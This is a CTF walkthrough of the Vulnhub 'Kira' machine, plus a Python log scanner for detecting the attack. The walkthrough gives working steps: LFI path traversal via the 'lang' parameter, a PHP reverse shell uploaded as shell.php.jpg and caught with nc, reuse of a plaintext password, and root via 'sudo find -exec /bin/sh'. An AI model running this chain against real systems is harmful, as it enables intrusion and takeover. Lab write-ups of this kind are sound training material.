[VULNHUB] KiraCTF

Today we are going to hack the Vulnhub machine called Kira. You can download it from the following link: KiraCTF

Enumeration


We start with an nmap scan to see which ports are open.

> nmap -A -p- 192.168.1.24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-13 13:09 CET
Nmap scan report for bassam-aziz.home (192.168.1.24)
Host is up (0.0025s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
We see that only port 80 is open, so we look at it in more detail with the help of gobuster.

> gobuster dir -u http://192.168.1.24/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.24/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/13 13:28:41 Starting gobuster
===============================================================
/uploads (Status: 301)
/server-status (Status: 403)
===============================================================
2020/11/13 13:31:26 Finished
===============================================================
We find the "uploads" directory. If we browse to http://192.168.1.24/uploads, we see two buttons. The first button lets us upload an image, and the second takes us to a page titled LFI, which we can exploit through the "lang" parameter.

http://192.168.1.24/language.php?lang=../../../etc/passwd
Seeing this, we will upload a PHP reverse shell and execute it through the LFI. We prepare our reverse shell.

cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
We edit it to set our IP and port...

nano shell.php.jpg
Note that bypassing the image check is, in this case, as simple as renaming our shell.php to shell.php.jpg. Once the previous steps are done, we upload the file shell.php.jpg. We start nc listening.

> nc -nlvp 1234
And we visit:

http://192.168.1.24/language.php?lang=../../../var/www/html/uploads/shell.php.jpg
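As an added example (not part of the original write-up), the Python below scans constructed Apache access-log lines for the two steps of this chain from the defender's side: a traversal in the `lang` parameter of language.php, and an include or request of a double-extension upload such as shell.php.jpg. The sample log lines, the log format and the allowlist of language codes are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines mirroring the write-up's requests (not real logs).
SAMPLE_LOG = """\
192.168.1.102 - - [13/Nov/2020:13:30:01 +0100] "GET /language.php?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.102 - - [13/Nov/2020:13:40:12 +0100] "GET /language.php?lang=../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.102 - - [13/Nov/2020:13:41:03 +0100] "POST /upload.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
192.168.1.102 - - [13/Nov/2020:13:42:55 +0100] "GET /language.php?lang=..%2F..%2F..%2Fvar/www/html/uploads/shell.php.jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.102 - - [13/Nov/2020:13:43:10 +0100] "GET /uploads/holiday.jpg HTTP/1.1" 200 80231 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
ALLOWED_LANGS = {"en", "es", "ar"}  # assumed legitimate values; language.php should take a code, never a path

def has_traversal(value):
    """True if a (possibly double-encoded) value walks out of its directory or is absolute."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    if decoded.startswith("/") or "\x00" in decoded:
        return True
    return ".." in decoded.split("/")

def double_extension(path):
    """True for names like shell.php.jpg: a PHP extension hidden in front of the image one."""
    parts = path.rsplit("/", 1)[-1].lower().split(".")
    return len(parts) >= 3 and any(p.startswith("php") or p in ("phtml", "phar") for p in parts[1:-1])

def analyze_line(line):
    """Return the findings for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    for value in parse_qs(url.query, keep_blank_values=True).get("lang", []):
        if has_traversal(value):
            findings.append("lfi-traversal")
        elif value not in ALLOWED_LANGS:
            findings.append("lang-not-allowlisted")
        if double_extension(unquote(value)):
            findings.append("include-of-double-extension")
    if double_extension(unquote(url.path)):
        findings.append("double-extension-request")
    return findings

def scan(log_text):
    """Map 1-based line numbers to their findings, dropping benign lines."""
    numbered = ((n, analyze_line(line)) for n, line in enumerate(log_text.splitlines(), 1))
    return {n: findings for n, findings in numbered if findings}
```

Running `scan(SAMPLE_LOG)` flags only lines 2 and 4; the allowlist check also catches a `lang` value that is not a path but is still not a known language code.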

Low Shell


We get our shell :D

> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.24] 42010
Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:04:21 up 34 min,  1 user,  load average: 1.02, 1.02, 0.98
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bassam   :0       :0               12:30   ?xdm?  33:07   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
We explore the system to see if we find anything.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bassam-aziz:/var/www/html$ ls -la
total 28
drwxr-xr-x 4 root root 4096 مار 26  2020 .
drwxr-xr-x 3 root root 4096 مار 26  2020 ..
-rw-r--r-- 1 root root  163 مار 26  2020 index.html
-rw-r--r-- 1 root root  287 مار 26  2020 language.php
drwxr-xr-x 2 root root 4096 نوف  4 10:52 supersecret-for-aziz
-rw-r--r-- 1 root root  747 مار 26  2020 upload.php
drwxrwxrwx 2 root root 4096 نوف 14 12:43 uploads
www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 نوف  4 10:52 .
drwxr-xr-x 4 root root 4096 مار 26  2020 ..
-rw-r--r-- 1 root root   15 نوف  4 10:52 bassam-pass.txt
www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt
Password123!@#
It looks like we have found the password of the user bassam, so we log in!

www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su bassam
su bassam
Password: Password123!@#

user.txt



bassam@bassam-aziz:~$ cat user.txt
THM{Bassam-Is-Better_Than-KIRA}

Privilege Escalation


We check whether we can do anything with sudo.

bassam@bassam-aziz:~$ sudo -l
[sudo] password for bassam: Password123!@#
Matching Defaults entries for bassam on bassam-aziz:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on bassam-aziz:
    (ALL : ALL) /usr/bin/find
We see that we can run find, so we use it to get our privileged shell!

bassam@bassam-aziz:~$ sudo find . -exec /bin/sh \; -quit
# cd /root
# ls
flag.txt
# cat flag.txt
THM{root-Is_Better-Than_All-of-THEM-31337}

End


And with that we are root on the machine.